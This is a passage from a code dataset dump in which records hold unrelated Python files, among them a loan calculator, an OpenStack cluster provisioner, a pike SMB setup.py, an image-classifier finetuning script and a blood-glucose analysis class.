proxy_list)\n","sub_path":"WebScraping/proxy/proxy_scrap.py","file_name":"proxy_scrap.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"463589394","text":"casa=float(input('qual o valor dea casa que deseja comprar?'))\nsalario=float(input('e qual o valor do seu salario?'))\nanos=int(input('em quantos anos pretende pagar ?'))\naaa=anos*12\nprestação=casa/aaa\nif prestação>(30/100*salario):\n print('pra pagar uma casa de R${:.2f}, em {} anos a prestação sera de {:.2f}, assim o valor de emprestimo foi negado!'.format(casa,anos,prestação))\nelse:\n print('o emprestimo foi concedido com sucesso!')\n #esqueci como fazia a atribuição burro","sub_path":"cas.py","file_name":"cas.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"591634717","text":"\n\n#calss header\nclass _QUIZ():\n\tdef __init__(self,): \n\t\tself.name = \"QUIZ\"\n\t\tself.definitions = [u'a game or competition in which you answer questions: ', u'a short informal test: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_quiz.py","file_name":"_quiz.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"488836707","text":"import cv2\nimport dlib\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ndef load_dlib_data(num, root_path, point):\n # Load the detector\n detector = dlib.get_frontal_face_detector()\n # Load the predictor\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n # read the image\n img_path = 'img/'\n X = np.ones((num,point,2))\n for file in range(num):\n image = cv2.imread(root_path + img_path + '{}'.format(file) +'.jpg', 0) \n # Use detector to find landmarks\n faces = detector(image)\n for face in faces:\n # Create landmark object\n landmarks = predictor(image=image, box=face)\n # Loop through all the points\n for n in range(0, point):\n X[file][n] = [landmarks.part(n).x,landmarks.part(n).y]\n return X\n\n# Load the csv\ndef load_label(label,root_path):\n labels = pd.read_csv(root_path + 'labels.csv', delim_whitespace = True, header=0)\n Y = labels[[label]]\n Y = np.array(Y)\n return Y\n\n# The one used in main.py\ndef pre_processing(num, label, root_path, point, split = True):\n X = load_dlib_data(num, root_path, point)\n Y = load_label(label, root_path)\n X = X.reshape(X.shape[0],-1) # Match model input\n #determine whether to split the data into training set and test set\n if (split == True):\n x_train, x_test, y_train, y_test = train_test_split(X, Y, train_size=0.8)\n return x_train, x_test, y_train, y_test\n else:\n return X, Y","sub_path":"Dlib_load_data.py","file_name":"Dlib_load_data.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"366913484","text":"#!/usr/bin/env python\n\nimport logging\nimport os\nimport time\n\nimport paramiko\nfrom novaclient.v2 import client\nfrom lib.common import *\nfrom conf import config\nfrom core.authenticator import Authenticator\nimport uuid\n\nlogging.basicConfig(level=logging.INFO)\n\nauthenticator = Authenticator()\n\nclass MisterCluster:\n\n def __init__(self, parameters=None):\n self.nova_clients = {}\n\n # I have re-purposed code from: https://github.com/ChameleonCloud/testing/blob/master/tests/test_chi.py\n def provision_new_instance(self, nova_client, host, user_data=None):\n\n # TODO: network_label is kind of hardcoded: it should be more generic!\n network_label = config.configuration[\"network_label\"]\n network = nova_client.networks.find(label=network_label)\n if network is None:\n logging.error(\"Could not found the requested network (name=%s)\" % (network_label))\n raise \"Could not found the requested network (name=%s)\" % (network_label)\n nics = [{'net-id': network.id}]\n\n # TODO: image_name is kind of hardcoded: it should be more generic!\n image_name = config.configuration[\"image_name\"]\n image = nova_client.images.find(name=image_name)\n if image is None:\n logging.error(\"Could not found the requested image (name=%s)\" % (image_name))\n raise \"Could not found the requested image (name=%s)\" % (image_name)\n\n # TODO: flavor_name is kind of hardcoded: it should be more generic!\n flavor_name = config.configuration[\"flavor_name\"]\n flavor = nova_client.flavors.find(name=flavor_name)\n if flavor is None:\n logging.error(\"Could not found the requested flavor (name=%s)\" % (flavor_name))\n raise \"Could not found the requested flavor (name=%s)\" % (flavor_name)\n\n keypair_name = config.configuration[\"keypair_name\"]\n keypair = nova_client.keypairs.find(name=keypair_name)\n if keypair is None:\n logging.error(\"Could not found the requested keypair (name=%s)\" % (keypair_name))\n raise \"Could not found the requested keypair (name=%s)\" % (keypair_name)\n\n # Boot an instance with the selected parameters\n logging.info(\"Preparing to boot a new nova instance\")\n current_hosts_count = len(host.cluster.host_set.all())\n # instance_name = config[\"instance_name_pattern\"] % (current_hosts_count)\n # instance_name = \"%s_%s\" % (cluster_db_object.name, current_hosts_count)\n instance_name = host.name if host.name != \"\" else \"%s%s\" % (host.cluster.name, current_hosts_count)\n instance_name = instance_name.lower()\n instance_name = ''.join([i for i in instance_name if i.isalnum()])\n logging.info(\"Booting a new nova instance with the following name: %s\" % (instance_name))\n instance = nova_client.servers.create(instance_name, image, flavor, key_name=keypair.name, userdata=user_data)\n\n if host.name == \"\":\n host.name = instance_name\n host.save()\n host.instance_id = instance.id\n host.save()\n\n logging.info(\"Waiting for the instance %s to be active\" % (instance_name))\n while instance.status != \"ACTIVE\":\n instance = nova_client.servers.find(id=instance.id)\n time.sleep(10)\n\n logging.info(\"The instance %s is now active!\" % (instance_name))\n\n logging.info(\"Getting the FixedIp of instance %s\" % (instance_name))\n networks_names = instance.networks.keys()\n fixed_ip = None\n if len(networks_names) > 0:\n network_candidate_name = networks_names[0]\n network_candidate_ips = instance.networks[network_candidate_name]\n if len(network_candidate_ips) > 0:\n fixed_ip = network_candidate_ips[0]\n logging.info(\"The FixedIp of instance %s is %s\" % (instance_name, fixed_ip))\n\n if fixed_ip is None:\n raise Exception(\"could not find a network associated to the newly created instance.\")\n\n # Provide a floating IP to the newly created instance\n logging.info(\"I will try to give a FloatingIp to %s\" % (instance_name))\n get_an_available_floating_ip = lambda: nova_client.floating_ips.findall(instance_id=None)\n if get_an_available_floating_ip is None:\n logging.info(\"a new floating IP will be created for instance (%s)\" % (instance.id))\n nova_client.floating_ips.create()\n while not get_an_available_floating_ip():\n time.sleep(5)\n floating_ip = get_an_available_floating_ip()[0]\n logging.info(\"A floating IP (%s) is available for instance (%s)\" % (floating_ip, instance.id))\n\n nova_client.servers.add_floating_ip(instance, floating_ip)\n logging.info(\"A floating IP (%s) has been associated to instance (%s)\" % (floating_ip, instance.id))\n\n # Reload Instance\n instance = nova_client.servers.find(id=instance.id)\n\n logging.info(\"Instance has been provisionned with id=%s\" % (instance.id))\n\n return (instance, host)\n\n def get_novaclient_associated_to_site(self, user, site):\n\n if not site in self.nova_clients:\n import novaclient\n os_auth_url = site.os_auth_url\n username = user.username\n from core.authenticator import Authenticator\n authenticator = Authenticator()\n password = authenticator.decrypt_password(\"tmp/%s\" % (user.username))\n project = user.project\n novaclient = novaclient.v2.client.Client(username, password, project, os_auth_url)\n self.nova_clients[site] = novaclient\n return self.nova_clients[site]\n\n def generate_clusters_keypairs(self, cluster):\n\n request_uuid = cluster.uuid\n tmp_folder = \"tmp/%s\" % (request_uuid)\n\n if not os.path.exists(tmp_folder):\n os.makedirs(tmp_folder)\n\n # Generate ssh key\n if not cluster.private_key and not cluster.public_key:\n logging.info(\"Generating a new pair (public_key, private_key) in %s\" % (tmp_folder))\n key_paths = generate_rsa_key(tmp_folder)\n else:\n key_paths = {\n \"public\": \"%s/public.key\" % (tmp_folder),\n \"private\": \"%s/private.key\" % (tmp_folder)\n }\n if not os.path.exists(key_paths[\"public\"]):\n with open(key_paths[\"public\"], \"w\") as f:\n f.write(cluster.public_key)\n if not os.path.exists(key_paths[\"private\"]):\n with open(key_paths[\"private\"], \"w\") as f:\n f.write(cluster.private_key)\n\n # # Generate API token for the project\n # certificate = authenticator.generate_public_certification(tmp_folder)\n # cluster.security_certificate = certificate\n # cluster.save()\n\n def add_node_to_cluster(self, host, master=None):\n\n logging.info(\"Starting addition of a node (%s) to the cluster <%s>\" % (host.id, host.cluster_id))\n\n cluster_db_object = host.cluster\n targetted_site = cluster_db_object.site\n targetted_user = cluster_db_object.user\n nova_client = self.get_novaclient_associated_to_site(targetted_user, targetted_site)\n\n is_master = cluster_db_object.get_master_node() is None\n cluster_type = cluster_db_object.software.name\n\n logging.info(\"Is this new node a master node? %s\" % (is_master))\n\n request_uuid = cluster_db_object.uuid\n tmp_folder = \"tmp/%s\" % (request_uuid)\n # user = host.cluster.user.username\n user = config.configuration[\"user\"]\n\n if not os.path.exists(tmp_folder):\n os.makedirs(tmp_folder)\n\n logging.info(\"node will be configured with script from %s folder\" % (tmp_folder))\n\n request_uuid = cluster_db_object.uuid\n tmp_folder = \"tmp/%s\" % (request_uuid)\n key_paths = {\n \"public\": \"%s/public.key\" % (tmp_folder),\n \"private\": \"%s/private.key\" % (tmp_folder)\n }\n with open(key_paths[\"public\"], \"r\") as f:\n public_key = f.readline()\n with open(key_paths[\"private\"], \"r\") as f:\n private_key = \"\".join(f.readlines())\n\n if not host.cluster.private_key:\n host.cluster.private_key = private_key\n host.cluster.save()\n\n if not host.cluster.public_key:\n host.cluster.public_key = public_key\n host.cluster.save()\n\n logging.info(\"private/public keys available for the instance\")\n\n if is_master:\n cluster_db_object.public_key = public_key\n cluster_db_object.private_key = private_key\n cluster_db_object.save()\n logging.info(\"private/public keys uploaded to the cluster\")\n\n # Generate script that will configure the node\n variables = {\n \"public_key\": public_key,\n \"private_key\": private_key,\n \"is_master\": is_master,\n \"user\": user,\n }\n\n if not is_master:\n logging.info(\"I search the master-node that will be configured with the new node\")\n variables[\"is_master\"] = False\n master_node = cluster_db_object.get_master_node()\n master_node_id = master_node.instance_id\n master = nova_client.servers.find(id=master_node_id)\n master_ip = master.networks[master.networks.keys()[0]][0]\n variables[\"master_ip\"] = master_ip\n variables[\"master_name\"] = master.name\n logging.info(\"I found the master-node that will be configured with the new node\")\n\n logging.info(\"Creating user data for the instance\")\n user_data_path = \"%s/user_data\" % (tmp_folder)\n user_data = generate_template(\"%s/user_data.jinja2\" % cluster_type, variables)\n generate_template_file(\"%s/user_data.jinja2\" % cluster_type, user_data_path, variables)\n logging.info(\"User data successfully generated!\")\n\n logging.info(\"Calling 'provision_new_instance' to create an instance\")\n\n # Provision an instance\n (instance, host) = self.provision_new_instance(nova_client, host, user_data=user_data)\n\n logging.info(\"The instance has been created\")\n\n if is_master:\n host.is_master = True\n host.save()\n logging.info(\"A master node of cluster <%s> has been elected\" % (host.cluster_id))\n\n time.sleep(3)\n instances_ids = map(lambda x: x.instance_id, cluster_db_object.host_set.all())\n instances = map(lambda id: nova_client.servers.find(id=id), instances_ids)\n\n logging.info(\"Updating hosts file of nodes %s\" % (instances_ids))\n update_hosts_file(instances, user, key_paths[\"private\"], tmp_folder=tmp_folder)\n logging.info(\"Hosts file of nodes %s have been updated\" % (instances_ids))\n\n floating_ip = detect_floating_ip_from_instance(instance)\n host.instance_ip = floating_ip\n host.save()\n logging.info(\"The new instance has now a floating IP (%s)\" % (floating_ip))\n\n variables[\"node_ip\"] = floating_ip\n variables[\"node_name\"] = instance.name\n\n if is_master:\n variables[\"is_master\"] = True\n variables[\"master_ip\"] = floating_ip\n variables[\"master_name\"] = instance.name\n\n # Giving time to the instance to fully startup\n time.sleep(2)\n\n # Try to connect to the instance\n logging.info(\"Trying to establish a ssh connection to the new instance\")\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(floating_ip, username=user, key_filename=key_paths[\"private\"])\n logging.info(\"Ssh connection established!\")\n\n execute_ssh_cmd(ssh, \"touch success\")\n\n # Configure Node\n logging.info(\"Preparing the new node\")\n prepare_node_path = \"%s/prepare_node\" % (tmp_folder)\n generate_template_file(\"%s/prepare_node.jinja2\" % cluster_type, prepare_node_path, variables)\n\n sftp = ssh.open_sftp()\n sftp.put(prepare_node_path, 'prepare_node.sh')\n time.sleep(5)\n\n execute_ssh_cmd(ssh, \"bash prepare_node.sh\")\n\n logging.info(\"Node prepared!\")\n\n # Configure cluster node\n logging.info(\"Configuring node to join the cluster\")\n configure_node_path = \"%s/configure_node\" % tmp_folder\n generate_template_file(\"%s/configure_node.jinja2\" % cluster_type, configure_node_path, variables)\n\n sftp = ssh.open_sftp()\n sftp.put(configure_node_path, 'configure_node.sh')\n time.sleep(5)\n execute_ssh_cmd(ssh, \"bash configure_node.sh\")\n\n logging.info(\"The node joined the cluster!\")\n\n if not is_master:\n time.sleep(30)\n # Updating master_node\n logging.info(\"Connecting to the master node\")\n master_node_floating_ip = detect_floating_ip_from_instance(master)\n ssh_master = paramiko.SSHClient()\n ssh_master.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh_master.connect(master_node_floating_ip, username=user, key_filename=key_paths[\"private\"])\n logging.info(\"Successfully connected to the master node!\")\n\n # Send files to the master node\n logging.info(\"Updating master node to take into account the new node\")\n update_master_node_path = \"%s/update_master_node\" % (tmp_folder)\n generate_template_file(\"%s/update_master_node.jinja2\" % cluster_type, update_master_node_path, variables)\n\n sftp_master = ssh_master.open_sftp()\n sftp_master.put(update_master_node_path, 'update_master_node.sh')\n time.sleep(5)\n ssh_master.exec_command(\"bash update_master_node.sh\")\n logging.info(\"Successfully updated the master node!\")\n\n return True\n","sub_path":"core/mister_cluster.py","file_name":"mister_cluster.py","file_ext":"py","file_size_in_byte":13856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"556597011","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2016-2020, Dell Inc. or its subsidiaries.\n# All rights reserved.\n# See file LICENSE for licensing information.\n#\n\nimport ctypes\nimport os\nimport unittest\n\ntry:\n from setuptools import setup, Extension, Command\nexcept ImportError:\n from distutils.core import setup, Extension, Command\nfrom distutils.command.build_ext import build_ext\nfrom distutils.command.build_py import build_py\nfrom distutils.errors import CCompilerError, DistutilsExecError, DistutilsPlatformError\n\n_HERED = os.path.abspath(os.path.dirname(__file__))\n_README = os.path.join(_HERED, 'README.md')\n\n# attempt building the kerberos extension\ntry_krb = True\next_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)\n\n\nclass BuildFailed(Exception):\n pass\n\n\nclass ve_build_ext(build_ext):\n # This class allows C extension building to fail.\n\n def run(self):\n try:\n build_ext.run(self)\n except DistutilsPlatformError:\n raise BuildFailed()\n\n def build_extension(self, ext):\n try:\n build_ext.build_extension(self, ext)\n except ext_errors:\n raise BuildFailed()\n\n\nclass ve_build_py(build_py):\n def run(self, *args, **kwds):\n if not try_krb:\n print(\"libgssapi_krb5 not available, skipping kerberos module\")\n build_py.run(self, *args, **kwds)\n\n\ntry:\n libgssapi_krb5 = ctypes.CDLL(\"libgssapi_krb5.so\")\n defines = [\n (\"HAVE_GSS_SET_CRED_OPTION\", hasattr(libgssapi_krb5, \"gss_set_cred_option\")),\n (\n \"HAVE_GSSSPI_SET_CRED_OPTION\",\n hasattr(libgssapi_krb5, \"gssspi_set_cred_option\"),\n ),\n ]\n lw_krb_module = Extension(\n \"pike.kerberos\",\n [\n \"pykerb/base64.c\",\n \"pykerb/kerberosbasic.c\",\n \"pykerb/kerberos.c\",\n \"pykerb/kerberosgss.c\",\n \"pykerb/kerberospw.c\",\n ],\n libraries=[\"gssapi_krb5\"],\n define_macros=defines,\n )\nexcept OSError:\n try_krb = False\n\n\ndef pike_suite():\n return unittest.defaultTestLoader.discover(\"pike/test\", pattern=\"*.py\")\n\n\n# Get the long description from the README.md file\nwith open(_README, 'rb') as f_:\n long_description = f_.read().decode(\"utf-8\")\n\n\ndef run_setup(with_extensions):\n ext_modules = []\n cmdclass = {\"build_py\": ve_build_py}\n if with_extensions:\n ext_modules.append(lw_krb_module)\n cmdclass = dict(cmdclass, build_ext=ve_build_ext)\n setup(\n name=\"pike-smb2\",\n use_scm_version=True,\n setup_requires=[\n 'setuptools_scm==5.0.2; python_version ~= \"2.7\"',\n 'setuptools_scm; python_version >= \"3.6\"',\n ],\n description=\"Pure python SMB client\",\n long_description_content_type='text/markdown',\n long_description=long_description,\n author=\"Brian Koropoff\",\n author_email=\"Brian.Koropoff@emc.com\",\n maintainer=\"Masen Furer\",\n maintainer_email=\"Masen.Furer@dell.com\",\n url=\"https://github.com/emc-isilon/pike\",\n project_urls={\n \"Source\": \"https://github.com/emc-isilon/pike\",\n \"Bug Reports\": \"https://github.com/emc-isilon/pike/issues\",\n },\n license=\"Simplified BSD License\",\n packages=[\"pike\", \"pike.test\"],\n entry_points={\"pytest11\": [\"pike = pike.pytest_support\",]},\n python_requires=\">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*\",\n install_requires=[\n 'enum34~=1.1.6; python_version ~= \"2.7\"',\n 'attrs~=19.3.0',\n \"pycryptodomex\",\n \"future\",\n \"six\",\n ],\n ext_modules=ext_modules,\n test_suite=\"setup.pike_suite\",\n cmdclass=cmdclass,\n # see https://pypi.org/classifiers/\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Testing\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Operating System :: OS Independent\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: BSD License\",\n ],\n keywords='smb smb-testing smb-client',\n )\n\n\ntry:\n run_setup(with_extensions=try_krb)\nexcept BuildFailed:\n run_setup(with_extensions=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155395216","text":"import os\nimport itertools\nimport random\nimport argparse\nimport torch\nimport numpy as np\nimport torchvision\nimport sys\nsys.path.append(\"../\")\nfrom dataloaders import standard_dataloaders\nfrom torch.utils.data import Dataset, DataLoader\nimport models\nimport data_utils\nimport tqdm\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nRAND_SEED = 1\ntorch.manual_seed(RAND_SEED)\ntorch.cuda.manual_seed(RAND_SEED)\nnp.random.seed(RAND_SEED)\nrandom.seed(RAND_SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nclass Identity(torch.nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, x):\n return x\n\ndef validate(val_dataloader, encoder, classifier):\n\n correct = 0\n total = 0\n\n with torch.no_grad():\n\n for iter, (data, labels) in enumerate(tqdm.tqdm(val_dataloader)):\n data = data.to(device)\n labels = labels.to(device)\n\n encoded = encoder(data)\n preds = classifier(encoded)\n\n _, predicted = torch.max(preds.data, 1)\n\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n\n accuracy = correct / total\n\n return accuracy\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--exp_type\")\n parser.add_argument(\"--source\")\n parser.add_argument(\"--target\")\n parser.add_argument(\"--save_dir\", type = str, default = '../weights/' )\n parser.add_argument(\"--data_path\", type = str, default = '../data/DomainNet')\n #model hyperparameters\n #optimizer hyperparameters\n parser.add_argument(\"--lr\", type = float, default = 0.001)\n parser.add_argument(\"--K\", type = int, default = 7)\n parser.add_argument('--batch_size', type=int, default=64)\n parser.add_argument(\"--num_epochs\", type = int, default = 50)\n parser.add_argument(\"--num_workers\", type = int, default = 16)\n #training helpers\n args = parser.parse_args()\n\n pretrain_dir = os.path.join(args.save_dir, '{}_pretrain'.format(args.source))\n pretrain_cls_fp = os.path.join(pretrain_dir, 'best_{}_cls_pretrain.pth'.format(args.source))\n pretrain_encoder_fp = os.path.join(pretrain_dir, 'best_{}_encoder_pretrain.pth'.format(args.source))\n save_dir = '../weights/{}'.format(args.exp_type)\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n\n encoder = torchvision.models.resnet101(pretrained=True)\n encoder.fc = Identity()\n classifier = torch.nn.Linear(2048, 350)\n\n\n encoder = torch.nn.DataParallel(encoder)\n classifier = torch.nn.DataParallel(classifier)\n\n encoder.load_state_dict(torch.load(pretrain_encoder_fp))\n\n encoder = encoder.to(device)\n classifier = classifier.to(device)\n\n cls_criterion = torch.nn.CrossEntropyLoss()\n optimizer_cls = torch.optim.SGD(itertools.chain(\n classifier.parameters(),\n encoder.parameters()) ,\n lr = args.lr, momentum = 0.9, nesterov = True)\n\n '''\n Get Target\n '''\n data_path = os.path.join(args.data_path, args.target)\n test_ims = os.path.join(args.data_path, '{}_test.txt'.format(args.target))\n train_ims = os.path.join(args.data_path, '{}_train.txt'.format(args.target))\n print (pretrain_dir, pretrain_cls_fp, test_ims, train_ims)\n target_data_train, target_data_val = data_utils.get_dataloaders(data_path, train_ims, test_ims, K = args.K)\n\n\n print (len(target_data_train), len(target_data_val))\n\n data_train = DataLoader(target_data_train, batch_size = args.batch_size, shuffle = True, drop_last = True)\n data_val = DataLoader(target_data_val, batch_size = args.batch_size, shuffle = False, drop_last = False, num_workers = args.num_workers)\n\n best_accuracy = -1\n for epoch_iter in range(args.num_epochs):\n\n running_epoch_loss = 0\n\n for iter, (data, labels) in enumerate(tqdm.tqdm(data_train)):\n\n\n optimizer_cls.zero_grad()\n\n data = data.to(device)\n labels = labels.to(device)\n\n encoded = encoder(data)\n preds = classifier(encoded)\n\n cls_loss = cls_criterion(preds, labels)\n\n cls_loss.backward()\n optimizer_cls.step()\n\n running_epoch_loss += cls_loss.item()\n\n\n\n epoch_loss = running_epoch_loss / len(data_train)\n\n accuracy = validate(data_val, encoder, classifier)\n\n print (\"|Epoch: {} | Epoch Loss: {} | Val Accuracy: {}|\".format(epoch_iter+1, epoch_loss, accuracy))\n\n if accuracy > best_accuracy:\n best_accuracy = accuracy\n encoder_f = 'best_{}_encoder_pretrain.pth'.format(args.exp_type)\n cls_f = 'best_{}_cls_pretrain.pth'.format(args.exp_type)\n\n encoder_path = os.path.join(save_dir, encoder_f)\n cls_path = os.path.join(save_dir, cls_f)\n\n torch.save(encoder.state_dict(), encoder_path)\n torch.save(classifier.state_dict(), cls_path)\n","sub_path":"domainnet/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"336475958","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# - вынимает из конфы checklist.json - список страниц с чексуммами их json-описаний и page_ids для поста страниц\n# - считает чексуммы текущщих описаний *.comments и в случае расхождений формируем статус (page_status) в worklist.json\n# - есть страница, чексумма не поменялась -- пропускаем \"unchanged\"\n# - есть страница, чексумма поменялась -- делаем \"update\"\n# - нет страницы -- делаем \"add\"\n# - data_dictionary модуль различает UPDATE, ADD и UNCHANGED в случае UPDATE использует предоставленные page_id-ы\nimport json\nimport os\nimport re\nfrom ertelecom.checklist import md5, load_checklist\n\n\nCONNECTIONS_FILE = \"connections.json\"\nWORKLIST_FILE = \"worklist.json\"\nCHECKLIST_FILE = \"checklist.json\"\n\n\ndef load_comments_folder(folder):\n checklist = load_checklist(CHECKLIST_FILE)\n files = [f for f in os.listdir(folder) if re.match(r\".*\\.json\", f)]\n meta_part = []\n for file_name in files:\n with open(folder + file_name, \"r\") as comment_file:\n print(f\"Loading {folder}{file_name}...\")\n items = json.load(comment_file)\n database = list(items.keys())[0]\n tables_dict = items[database][\"tables\"]\n\n md5_file = md5(folder + file_name)\n md5_old = (checklist.get(folder + file_name) or {}).get(\"md5\") or \"-1\"\n database_page = (checklist.get(folder + file_name) or {}).get(\"database_page\") or -1\n table_pages = (checklist.get(folder + file_name) or {}).get(\"table_pages\") or {}\n if md5_old == \"-1\":\n operation = \"add\"\n print(f\" - new database, ADD needed ({md5_old} vs {md5_file})\")\n meta_part.append(\n {\"name\": database, \"tables\": list(tables_dict.keys()), \"skip_partitions\": True, \"page_status\": operation}\n )\n elif md5_file != md5_old:\n operation = \"update\"\n print(f\" - differnt checksums, UPDATE needed ({md5_old} vs {md5_file})\")\n meta_part.append(\n {\n \"name\": database,\n \"tables\": list(tables_dict.keys()),\n \"skip_partitions\": True,\n \"page_status\": operation,\n \"database_page\": database_page,\n \"table_pages\": table_pages,\n }\n )\n else:\n operation = \"unchanged\"\n print(f\" - no difference found, SKIPPING ({md5_old} vs {md5_file})\")\n meta_part.append(\n {\"name\": database, \"tables\": list(tables_dict.keys()), \"skip_partitions\": True, \"page_status\": operation}\n )\n\n return meta_part\n\n\nif __name__ == \"__main__\":\n meta = {}\n with open(WORKLIST_FILE, \"w\") as wl_file, open(CONNECTIONS_FILE, \"r\") as connections_file:\n connections = json.load(connections_file)\n meta[\"hive\"] = load_comments_folder(connections[\"hive\"][\"comments_path\"])\n meta[\"clickhouse\"] = load_comments_folder(connections[\"clickhouse\"][\"comments_path\"])\n print(f\"Writing {wl_file}\")\n json.dump(meta, wl_file, indent=4)\n print(\"Done\")\n\n","sub_path":"generate_conf.py","file_name":"generate_conf.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"100109002","text":"import operator\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\n\nclass Explorer():\n def __init__(self, df, lo=70, up=180, \n begin_date=dt.datetime(1700, 1, 1, 0, 0), \n end_date=dt.datetime(2200, 1, 1, 0, 0)):\n \"\"\" df: dataframe with all the data this explorer needs\n lo: lower bound for bg care analysis\n up: upper bound for bg care analysis\n begin_date: begin date for studied interval\n end_date: end date for studied interval\n \"\"\"\n self.df = df\n self.lo = lo\n self.up = up\n self.begin_date = begin_date\n self.end_date = end_date\n\n def update(self, df=None, lo=None, up=None, begin_date=None, end_date=None):\n \"\"\"Update attributes in our explorer object\"\"\"\n if df:\n self.df = df\n if lo:\n self.lo = lo\n if up:\n self.up = up\n if begin_date:\n self.begin_date = dt.datetime(begin_date.year, begin_date.month,\n begin_date.day) - pd.DateOffset(days=0)\n if end_date:\n self.end_date = dt.datetime(end_date.year, end_date.month,\n end_date.day, 23, 59, 59) - pd.DateOffset(days=0)\n\n def bg_count(self):\n \"\"\"Number of non-null blood glucose registries\"\"\"\n return self.df.bg.count()\n\n def interval_filter(self):\n \"\"\"Returns dataframe of registries inside self.interval\"\"\"\n return ((self.df.date >= self.begin_date) &\n (self.df.date <= self.end_date))\n\n def meal_filter(self, meal='all', moment='before'):\n \"\"\"Returns boolean dataframe of registries of\n meals based on filters given as parameters.\n\n moments: before, after, all\n\n meals: snack, breakfast, lunch, dinner, all, no_meal\n\n if filtering for meals='no_meal', this algorithm works the same way as if\n meals='all', except it returns the opposite boolean value for each cell\n \"\"\"\n meals = (['snack', 'dinner', 'lunch', 'breakfast']\n if meal in 'all no_meal'\n else [meal])\n\n if moment == 'after':\n meals = ['after_'+meal for meal in meals]\n elif moment == 'all' or meal == 'no_meal':\n meals += ['after_'+meal for meal in meals] \n\n # test for intersection with meals\n sel = operator.eq if meal == 'no_meal' else operator.gt\n return self.df.tags.apply(lambda tag :\n sel(len([m for m in meals if m in tag]), 0)\n if isinstance(tag, str)\n else sel == operator.eq)\n\n def basic_stats(self, column, op, meal=None, moment=None,\n operate_on_cumsum=None):\n \"\"\"Basic stats should handle any operation that depends only\n on a row's value (not on next row, or on a group of rows) and\n uses this class' standard interval and meal filters.\n \"\"\"\n if not meal:\n filtered_df = self.df\n else:\n filtered_df = self.df[self.meal_filter(meal, moment)]\n\n # todo: function to group by anything\n if operate_on_cumsum == 'per_day':\n # group by day\n filtered_df = filtered_df.groupby(filtered_df.date.dt.normalize()).sum()\n elif operate_on_cumsum == 'per_week':\n return 1\n # group by week\n pass\n elif operate_on_cumsum == 'per_month':\n return 2\n # group by month\n pass\n\n filtered_df = filtered_df[column]\n if op == 'cumsum': #cumulative sum\n return filtered_df.sum()\n elif op == 'avg':\n return filtered_df.mean()\n elif op == 'std': #std deviation\n return filtered_df.std()\n\n def range_time(self, region='in', count=False):\n \"\"\"Percentage (our count) of registries with bg in, above or below\n range.\n\n region: below, above, in\n \"\"\"\n if region == 'below':\n region_df = self.df.bg[self.df.bg < self.lo]\n elif region == 'above':\n region_df = self.df.bg[self.df.bg > self.up]\n else:\n region_df = (self.df.bg[(self.df.bg >= self.lo)\n & (self.df.bg <= self.up)])\n\n region_df = region_df[self.interval_filter()]\n\n if count:\n return region_df.count()\n else:\n return region_df.count()*100/self.df.bg.count()\n\n def HbA1c(self, up_until=None, use_interval=None):\n \"\"\"Glycated hemoglobin starting 3 months before up_until and ending at\n up_until.\n\n If up_until == None, calculates HbA1c starting 3 months from today.\n If use_interval, uses explorer's interval.\n \"\"\"\n if up_until:\n start_date = up_until\n else:\n start_date = dt.datetime.now()\n\n if use_interval:\n start_date = self.begin_date\n else:\n start_date -= pd.DateOffset(months=3)\n\n avg_bg = self.df.bg[self.df.date >= start_date].mean()\n return (avg_bg+46.7)/28.7\n","sub_path":"explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202524025","text":"# If you get a PayPal error, you'll get a PayPal error code back.\n# 